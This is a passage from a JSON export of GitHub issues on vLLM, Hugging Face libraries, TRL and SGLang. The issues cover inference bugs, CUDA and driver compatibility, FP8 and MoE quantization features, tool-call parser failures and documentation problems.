^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 4541, in capture_model\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] self._capture_cudagraphs(\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] File \"/home/jovyan/rl/.pixi/envs/infer/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 4615, in _capture_cudagraphs\n(Worker_DP1_TP0_DCP0_EP4 pid=479) ERROR 12-15 10:54:08 [multiproc_executor.py:822] self._dummy_run(\n(Worker_DP1_TP0_DCP0_EP4 pid=479)", "url": "https://github.com/vllm-project/vllm/issues/30736", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-16T03:07:59Z", "updated_at": "2025-12-22T17:11:48Z", "comments": 3, "user": "Butterfingrz" }, { "repo": "huggingface/transformers.js", "number": 1487, "title": "License clarification for some of the converted models", "body": "### Question\n\nHello!\n\nI want to use [Xenova/whisper-small](https://huggingface.co/Xenova/whisper-small) and [Xenova/UAE-Large-V1](https://huggingface.co/Xenova/UAE-Large-V1) in a project, but I noticed that these model cards on Hugging Face do not have a license specified in their metadata or README.\n\nSince the original weights from OpenAI and WhereIsAI are licensed, I assume these converted ONNX versions are intended to follow the same or a similar open-source licenses. Could you please clarify:\n\n- Are these models safe to use for commercial/personal projects?\n- Is it possible to update the model cards to explicitly include the license tag?\n\n\nThanks again!", "url": "https://github.com/huggingface/transformers.js/issues/1487", "state": "closed", "labels": [ "question" ], "created_at": "2025-12-16T00:27:16Z", "updated_at": "2025-12-16T19:13:09Z", "user": "rmahdav" }, { "repo": "vllm-project/vllm", "number": 30722, "title": "[Bug]: llama4_pythonic tool parser fails with SyntaxError on nested list parameters", "body": "### Your current environment\n\nI don't have direct access to the cluster the model is running in. But it's running on 8x H100 GPUs using TP 8, expert parallel. \n\nThis is the fp8 model from Huggingface.\n\nThese are the vllm serve args I'm using:\n\nVLLM Version: 0.11.0\n\n```\n--port 8002 \n--model /config/models/maverick \n--device cuda \n--tensor-parallel-size 8 \n--disable-log-requests \n--max-num-batched-tokens 16000 \n--served-model-name 'llama-4-maverick-17b-128e-instruct' \n--limit-mm-per-prompt image=50 \n--kv-cache-dtype fp8 \n--trust-remote-code \n--enable-auto-tool-choice \n--enable-chunked-prefill true \n--enable-prefix-caching \n--tool-call-parser llama4_pythonic \n--enable-expert-parallel \n--chat-template examples/tool_chat_template_llama4_pythonic.jinja \n--override-generation-config '{\\\"attn_temperature_tuning\\\": true}' \n--max-model-len 1000000\n```\n\n### \ud83d\udc1b Describe the bug\n\n### Description\n\nThe `llama4_pythonic` tool parser intermittently fails to parse valid tool calls, resulting in:\n1. `SyntaxError` from `ast.parse()` when model output is malformed (missing closing `]`)\n2. Valid pythonic syntax returned as `content` instead of being parsed into `tool_calls`\n\n### Reproduction\n\n**Minimal curl (run 10+ times to observe intermittent failure):**\n\n```bash\ncurl -X POST https://your-vllm-endpoint/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"llama-4-maverick-17b-128e-instruct\",\n \"messages\": [\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": \"how do I enroll in benefits?\"}\n ],\n \"tools\": [{\n \"type\": \"function\",\n \"function\": {\n \"name\": \"enterprise_search\",\n \"description\": \"Search enterprise knowledge base\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"query\": {\"type\": \"string\"},\n \"rephrased_queries\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"},\n \"description\": \"List of 2 rephrased queries\"\n }\n },\n \"required\": [\"query\", \"rephrased_queries\"]\n }\n }\n }],\n \"tool_choice\": \"auto\",\n \"max_tokens\": 500,\n \"temperature\": 0,\n \"top_p\": 0.95\n }'\n```\n\n**Observed results (10 identical requests):**\n- 7/10: \u2705 `finish_reason: \"tool_calls\"`, properly parsed\n- 3/10: \u274c `finish_reason: \"stop\"`, pythonic syntax in `content` field, empty `tool_calls`\n\n### Failure Modes Observed\n\n**Mode 1: Valid pythonic not parsed**\n```json\n{\n \"finish_reason\": \"stop\",\n \"message\": {\n \"content\": \"[enterprise_search(query=\\\"Benefits enrollment\\\", rephrased_queries=[\\\"...\\\", \\\"...\\\"])]\",\n \"tool_calls\": []\n }\n}\n```\nParser fails to detect valid syntax \u2192 returned as content.\n\n**Mode 2: Model generates text after tool call**\n```json\n{\n \"content\": \"[enterprise_search(...)]\\n\\nI was unable to execute this task...\"\n}\n```\nModel mixes tool call + text, which violates parser assumption.\n\n**Mode 3: Malformed output (missing bracket)**\n```\n[enterprise_search(query='...', rephrased_queries=['...', '...'])\n```\nModel hits `stop_reason: 200007` before completing \u2192 `ast.parse()` throws SyntaxError.\n\n### Suspected Root Cause\n\n***The below is suggested by Claude Opus 4.5 so take with a grain of salt.***\n\n1. **Parser detection inconsistency** - Valid pythonic output intermittently not recognized as tool call\n2. **No text-after-tool-call handling** - Parser fails when model appends text after `]`\n3. **Stop token interference** - Model sometimes hits stop token (200007) mid-generation before completing brackets\n4. **Nested bracket complexity** - Array parameters (`rephrased_queries`) create `[...[...]...]` nesting that may confuse detection\n\n### Error Logs\n\n[err.txt](https://github.com/user-attachments/files/24175232/err.txt)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30722", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-15T21:26:24Z", "updated_at": "2025-12-15T21:26:24Z", "comments": 0, "user": "mphilippnv" }, { "repo": "huggingface/tokenizers", "number": 1913, "title": "Wrong and unsuppressable print when instantiating BPE", "body": "I am running Python code that is of the form\n\n```python\nfrom transformers import PreTrainedTokenizerFast\nfrom tokenizers import Tokenizer\nfrom tokenizers.models import BPE\n\nvocab = {\"a\": 5, \"b\": 6, \"ab\": 7}\nmerges = [(\"a\",\"b\")]\n\nbackend_of_backend_of_backend = BPE(vocab=vocab, merges=merges, dropout=None)\nbackend_of_backend = Tokenizer(model=backend_of_backend_of_backend)\nbackend = PreTrainedTokenizerFast(tokenizer_object=backend_of_backend)\n```\n\nThe line `BPE(vocab=vocab, merges=merges, dropout=None)` has nothing to do with serialisation. Yet, when I run it, an unwanted print\n```\nThe OrderedVocab you are attempting to save contains holes for indices [0, 1, 2, 3, 4], your vocabulary could be corrupted!\n```\nappears in my console, which seems to come from\n\nhttps://github.com/huggingface/tokenizers/blob/f7db48f532b3d4e3c65732cf745fe62863cbe5fa/tokenizers/src/models/mod.rs#L53-L56\n\nNot only is the print wrong (I am not trying to **save** anything), but also, it cannot be suppressed by redirecting `stdout` and `stderr` in Python. \n\n`println!` does not belong in low-level code, so at the very least, we need a way to disable it. But besides, what is this print even for, given that it says something about **saving** when we are **loading** a tokenizer?", "url": "https://github.com/huggingface/tokenizers/issues/1913", "state": "closed", "labels": [], "created_at": "2025-12-15T16:30:46Z", "updated_at": "2026-01-05T13:02:45Z", "comments": 4, "user": "bauwenst" }, { "repo": "vllm-project/vllm", "number": 30694, "title": "[Feature]: CompressedTensors: NVFP4A16 not supported for MoE models", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nNVFP4A16 (W4A16 FP4) quantization via compressed_tensors works for dense models but fails on MoE models like Qwen3-30B-A3B.\n\nLooking at `compressed_tensors_moe.py`, `_is_fp4a16_nvfp4` is checked for Linear layers but not in `get_moe_method()` for FusedMoE. Only W4A4 has a MoE method (`CompressedTensorsW4A4Nvfp4MoEMethod`).\n\nSince the Marlin kernel already supports FP4 weights + FP16 activations, is there a plan to add W4A16 MoE support for compressed_tensors? \n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30694", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-15T13:29:09Z", "updated_at": "2025-12-21T09:27:38Z", "comments": 2, "user": "zhangyimi" }, { "repo": "vllm-project/vllm", "number": 30685, "title": "[Feature]: fp8 kv cache for finer-grained scaling factors (e.g., per channel).", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nCurrently, the FP8 KV cache feature (in the FlashMLA interface) only supports per-tensor (scalar) scaling factors. Are you developing support for finer-grained scaling factors (e.g., per-channel)? If so, when can we expect the FP8 KV cache with such finer-grained scaling factors to be completed?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30685", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-15T09:32:48Z", "updated_at": "2025-12-15T09:32:48Z", "comments": 0, "user": "zx-ai" }, { "repo": "huggingface/transformers", "number": 42868, "title": "sdpa_paged: How does it handle paged cache without padding?", "body": "Hi @ArthurZucker ,\n\nI was analyzing the [sdpa_paged](https://github.com/huggingface/transformers/blob/main/src/transformers/integrations/sdpa_paged.py#L18) implementation and found the approach quite fascinating. I have a question regarding how the input shapes are handled.\n\nIf I have a batch of 4 sequences with lengths **32, 32, 64, and 128**, a standard SDPA call usually expects a shape of `[4, 128]` (Batch Size, Max Seq Len), where the shorter sequences are padded to 128.\n\nHowever, in this implementation, it appears that the input to SDPA is a flattened tensor with shape **`[1, 256]`** (the sum of all lengths: $32+32+64+128$), implying that no padding is used and the sequences are concatenated.\n\nCould you explain how standard SDPA produces the correct result in this case? Specifically, how does it differentiate between the sequences to prevent cross-sequence attention within this single packed batch?\n\nThanks for your time!\n\n\nrelated PR: #38085", "url": "https://github.com/huggingface/transformers/issues/42868", "state": "closed", "labels": [], "created_at": "2025-12-15T08:39:00Z", "updated_at": "2025-12-16T03:08:27Z", "comments": 4, "user": "jiqing-feng" }, { "repo": "huggingface/trl", "number": 4692, "title": "LLVM error during GRPO training with Apple M4 Max", "body": "I have the below error while doing GRPO training. I am using HuggingFace example codes for GRPO. I couldn't run the model on MPS because of this issue. \nHow can I run GRPO on MPS?\n\nloc(\"mps_matmul\"(\"(mpsFileLoc): /AppleInternal/Library/BuildRoots/4~B_wkugAG-524HdEQLaK0kvU7Y_D8Jtm6UxMaIoY/Library/Caches/com.apple.xbs/Sources/MetalPerformanceShadersGraph/mpsgraph/MetalPerformanceShadersGraph/Core/Files/MPSGraphUtilities.mm\":43:0)): error: incompatible dimensions\nloc(\"mps_matmul\"(\"(mpsFileLoc): /AppleInternal/Library/BuildRoots/4~B_wkugAG-524HdEQLaK0kvU7Y_D8Jtm6UxMaIoY/Library/Caches/com.apple.xbs/Sources/MetalPerformanceShadersGraph/mpsgraph/MetalPerformanceShadersGraph/Core/Files/MPSGraphUtilities.mm\":43:0)): error: invalid shape\nLLVM ERROR: Failed to infer result type(s).\n\nDetails: \nOS: Tahoe 26.2\npytorch 2.9.1\ntrl: 0.26.1\nMLX:0.30.0\n\n\n\n\n\n", "url": "https://github.com/huggingface/trl/issues/4692", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb GRPO" ], "created_at": "2025-12-14T23:01:49Z", "updated_at": "2025-12-14T23:02:11Z", "comments": 0, "user": "neslihaneti" }, { "repo": "vllm-project/vllm", "number": 30654, "title": "[Feature][Attention][UX]: Incorporate Features into Attention Selection", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSUMMARY:\n* we have default attention backends by priority and a notion of which backend supports what hw\n* however, certain features are not considered in this (e.g. fp8 kv cache, e.g. attention sinks)\n\nRecent example, we had test failures because we updated the logic to load kv cache quantization from the model config. But since CUTLASS_MLA is the default backend on B200, we started seeing test failures (since CUTLASS MLA does not support fp8 kv cache) because we were not automatically falling back to FLASHINFER_MLA (which does)\n\n\nSo the proposal is to:\n- make sure all attention backends report what features are supported\n- update the attention selector to consider these features in the selection\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30654", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-14T18:04:14Z", "updated_at": "2025-12-30T05:38:40Z", "comments": 11, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/diffusers", "number": 12838, "title": "Merge Loras for FLUX", "body": "The issue is based on https://huggingface.co/docs/diffusers/main/using-diffusers/merge_loras \n\nIs there a similar procedure for merging loras for FLUX models? The guide seems to be specific for UNet based methods. I'm working on FLUX-dev and I would like to perform a linear merge of my loras. ", "url": "https://github.com/huggingface/diffusers/issues/12838", "state": "open", "labels": [], "created_at": "2025-12-14T12:39:41Z", "updated_at": "2025-12-14T12:39:41Z", "comments": 0, "user": "shrikrishnalolla" }, { "repo": "vllm-project/vllm", "number": 30633, "title": "[Installation]: How to install vLLM 0.11.0 with CUDA < 12.9 (Driver 535)? No matching wheels found", "body": "### Your current environment\n\nI\u2019m trying to install vLLM 0.11.0 on a machine with NVIDIA Driver 535, and I ran into issues related to CUDA version compatibility.\n\nEnvironment\n\nOS: Linux (Ubuntu 20.04 / 22.04)\n\nGPU: NVIDIA GPU H20\n\nNVIDIA Driver: 535.xx\n\nPython: 3.10\n\nvLLM version: 0.11.0\n\nProblem\n\nAccording to the release information for vLLM 0.11.0, the available prebuilt wheels appear to target CUDA 12.9+.\nHowever, with Driver 535, CUDA 12.9 is not supported, and I cannot find any official wheels for CUDA 12.1 / 12.2 / 12.4 or lower.\n\nThis leads to the following questions:\n\nIs vLLM 0.11.0 officially compatible with CUDA versions < 12.9?\n\nIf yes, what is the recommended way to install it on systems with Driver 535?\n\nBuild from source with a specific CUDA version?\n\nUse a specific Docker image?\n\nPin to an older vLLM release?\n\nAre there plans to provide prebuilt wheels for CUDA 12.1 / 12.4, or is CUDA 12.9+ now a hard requirement going forward?\n\nWhat I\u2019ve tried\n\nChecked the GitHub Releases page for vLLM 0.11.0 \u2014 no wheels for CUDA < 12.9\n\nVerified that upgrading CUDA to 12.9 is not possible with Driver 535\n\nLooked for documentation on source builds for older CUDA versions, but didn\u2019t find clear guidance\n\nAny clarification or recommended workflow would be greatly appreciated.\nThanks in advance!\n\n### How you are installing vllm\n\n```sh\npip install -vvv vllm\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30633", "state": "open", "labels": [ "installation" ], "created_at": "2025-12-14T04:29:41Z", "updated_at": "2026-01-01T16:50:50Z", "comments": 1, "user": "whu125" }, { "repo": "vllm-project/vllm", "number": 30630, "title": "[Usage]: SymmMemCommunicator: Device capability 10.3 not supported", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nHi, I am seeing following warning using vllm serve on B300 instances.\n```\nWARNING 12-13 16:31:15 [symm_mem.py:67] SymmMemCommunicator: Device capability 10.3 not supported, communicator is not available.\n```\nvllm launch command\n```\nvllm serve \\\n --tensor-parallel-size 4 \\\n --kv-cache-dtype fp8 \\\n --tool-call-parser glm45 \\\n --reasoning-parser glm45 \\\n --enable-auto-tool-choice \\\n --model zai-org/GLM-4.6-FP8'\n```\nI built docker image using latest vllm on main branch commit 0e71eaa6447d99e76de8e03213ec22bc1d3b07df . Updated triton version to 3.5.1 and torch version to 2.9.1 to avoid compatibility issue from triton ([issue](https://github.com/triton-lang/triton/issues/8473)). \n\nfor same config benchmarking, I am seeing same perf as H200 (slightly worse) than B300. Is B300 fully supported on vllm yet?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30630", "state": "open", "labels": [ "usage", "nvidia" ], "created_at": "2025-12-14T01:00:34Z", "updated_at": "2025-12-18T21:17:42Z", "comments": 4, "user": "navmarri14" }, { "repo": "huggingface/transformers.js", "number": 1484, "title": "Should npm @xenova/transformers be deleted or marked deprecated?", "body": "### Question\n\nHello,\nI was surprised that none of the models I\u00a0tried were supported by transformerjs, even if they were using transformerjs in their README, until I realized that I was using the old npm package.\n\nShouldn't this package be removed ? Or marked as deprecated in favour of huggingface's ?\n\nBest,", "url": "https://github.com/huggingface/transformers.js/issues/1484", "state": "open", "labels": [ "question" ], "created_at": "2025-12-13T19:49:08Z", "updated_at": "2025-12-17T12:21:12Z", "user": "matthieu-talbot-ergonomia" }, { "repo": "huggingface/tokenizers", "number": 1910, "title": "[Docs] `Visualizer` dead links", "body": "It seems like documentation for `Visualizer` is out of date and all the links return 404.\n\nDocs: https://huggingface.co/docs/tokenizers/api/visualizer\nGithub Source: https://github.com/huggingface/tokenizers/blob/main/bindings/python/py_src/tokenizers/tools/visualizer.py", "url": "https://github.com/huggingface/tokenizers/issues/1910", "state": "open", "labels": [], "created_at": "2025-12-13T19:23:33Z", "updated_at": "2025-12-13T19:23:33Z", "comments": 0, "user": "dudeperf3ct" }, { "repo": "vllm-project/vllm", "number": 30621, "title": "[Feature]: Remove MXFP4 Logic From `fused_experts`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSUMMARY:\n* as part of effort to refactor MoE, trying to reduce cruft\n* we currently only have MX emulation in vLLM\n* the logic for this emulation should be moved into quark\n\nhttps://github.com/vllm-project/vllm/blame/main/vllm/model_executor/layers/fused_moe/fused_moe.py#L1866-L1899\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30621", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-13T18:30:30Z", "updated_at": "2026-01-04T14:47:45Z", "comments": 13, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30620, "title": "[Feature]: Remove Chunking From FusedMoE", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n* we have some chunking logic in the triton kernels to avoid IMA: https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/layers/fused_moe/fused_moe.py#L1807\n* we chunk in ~65k tokens\n* this case does not happen anymore because of chunked prefill\n\nWe should remove this\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30620", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-13T18:22:30Z", "updated_at": "2025-12-13T23:27:22Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30570, "title": "[Usage]: Why is VLLM still using SSE at all for mcp?", "body": "### Your current environment\n\nThis is a broad question: Why is vllm still using/hardcoding sse usage at all, when its been deprecated for well over six months at this point?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30570", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-12T20:02:08Z", "updated_at": "2025-12-18T10:50:37Z", "comments": 1, "user": "bags307" }, { "repo": "sgl-project/sglang", "number": 14984, "title": "Can the source code compilation and installation of sgl-kernel support the SM86 driver for CUDA12.9", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nEncountered problem: Unable to find the. so file for sm86 when installing the latest sgl-kernel0.3.19, only sm90 and higher are available\n\n### Reproduction\n\nQuestion: The machine is a GPU driver for SM86. Can installing sgl kernel in the nvcc 12.9 container source code adapt to SM86?\n\n### Environment\n\nEnvironment: The host is SM86, the nvcc version in the Docker container is 12.9, and torch and flash attn are CU129", "url": "https://github.com/sgl-project/sglang/issues/14984", "state": "open", "labels": [], "created_at": "2025-12-12T10:29:50Z", "updated_at": "2025-12-15T09:41:18Z", "comments": 1, "user": "zwt-1234" }, { "repo": "vllm-project/vllm", "number": 30548, "title": "[Feature]: Support for Q.ANT Photonic Computing ?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nhttps://qant.com/\nhttps://qant.com/wp-content/uploads/2025/11/20251111_QANT-Photonic-AI-Accelerator-Gen-2.pdf\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30548", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-12T10:16:53Z", "updated_at": "2025-12-12T14:45:53Z", "comments": 2, "user": "plitc" }, { "repo": "huggingface/tokenizers", "number": 1909, "title": "[Docs] `Encode Inputs` rendering issues", "body": "It seems like the documentation for Encode Inputs is not rendered properly.\n\nOfficial URL: https://huggingface.co/docs/tokenizers/main/en/api/encode-inputs?code=python\nGitHub URL: https://github.com/huggingface/tokenizers/blob/main/docs/source-doc-builder/api/encode-inputs.mdx", "url": "https://github.com/huggingface/tokenizers/issues/1909", "state": "open", "labels": [], "created_at": "2025-12-12T09:47:48Z", "updated_at": "2025-12-12T09:47:48Z", "comments": 0, "user": "ariG23498" }, { "repo": "vllm-project/vllm", "number": 30541, "title": "[Usage]: missing dsml token \"| DSML | \" with DeepSeek-V3.2 tools call", "body": "### Your current environment\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.0.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-50-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 565.57.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 208\nOn-line CPU(s) list: 0-207\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8563C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 52\nSocket(s): 2\nStepping: 2\nFrequency boost: enabled\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.9 MiB (104 instances)\nL1i cache: 3.3 MiB (104 instances)\nL2 cache: 208 MiB (104 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-51,104-155\nNUMA node1 CPU(s): 52-103,156-207\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Vulnerable, IBPB: disabled, STIBP: disabled, PBRSB-eIBRS: Vulnerable\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.1", "url": "https://github.com/vllm-project/vllm/issues/30541", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-12T06:47:03Z", "updated_at": "2025-12-12T20:59:40Z", "comments": 1, "user": "crischeng" }, { "repo": "vllm-project/vllm", "number": 30511, "title": "Potential Deadlock?", "body": "Consider using proper synchronization primitives like threading.Event or queue.Queue.get(timeout=...)", "url": "https://github.com/vllm-project/vllm/issues/30511", "state": "closed", "labels": [], "created_at": "2025-12-11T19:57:43Z", "updated_at": "2025-12-12T18:00:20Z", "comments": 1, "user": "ChuanLi1101" }, { "repo": "sgl-project/sglang", "number": 14903, "title": "Does the current Qwen3-VL (or Qwen3-VL-MoE) officially support TBO?", "body": "Hi team,\n\nI noticed that Qwen3-VL and Qwen3-MoE adopt different model architectures.\nWhen profiling the execution path, I found that:\n\nQwen3-MoE eventually falls back to the Qwen2-MoE implementation, which explicitly supports TBO (Two-Batch Overlap).\n\nHowever, Qwen3-VL takes the path of Qwen3-VL-MoE, and I did not find any clear implementation or code path that indicates TBO support for this variant.\n\nBased on the current codebase, it seems that Qwen3-VL-MoE may not have full TBO support, or its TBO integration is not obvious from the trace.", "url": "https://github.com/sgl-project/sglang/issues/14903", "state": "open", "labels": [], "created_at": "2025-12-11T13:26:50Z", "updated_at": "2025-12-11T13:26:50Z", "comments": 0, "user": "jerry-dream-fu" }, { "repo": "huggingface/transformers", "number": 42804, "title": "[`Quantization FP8`] Native `from_config` support", "body": "### Feature request\n\nRelated to https://github.com/huggingface/transformers/pull/42028#discussion_r2592235170\n\nSince FP8 is becoming more and more standard, it would be nice to create fp8 native models via config or more like using `from_config`. Atm, quant configs are not respected apparently - either that or we need to update the docs to show how to use it properly.\n\n### Motivation\n\nFp8 is becoming increasingly important\n\n### Your contribution\n\n\ud83d\udc40 ", "url": "https://github.com/huggingface/transformers/issues/42804", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-12-11T10:17:47Z", "updated_at": "2025-12-14T22:49:48Z", "comments": 3, "user": "vasqu" }, { "repo": "huggingface/trl", "number": 4679, "title": "[SFT] High vRAM consumption during eval loop", "body": "### Reproduction\n\n### Unexpected behavior\n\nWhen training a model on large sequences (>=20k tokens) with `PEFT LoRA` + `SFTTrainer` + `liger-kernel`, the vRAM 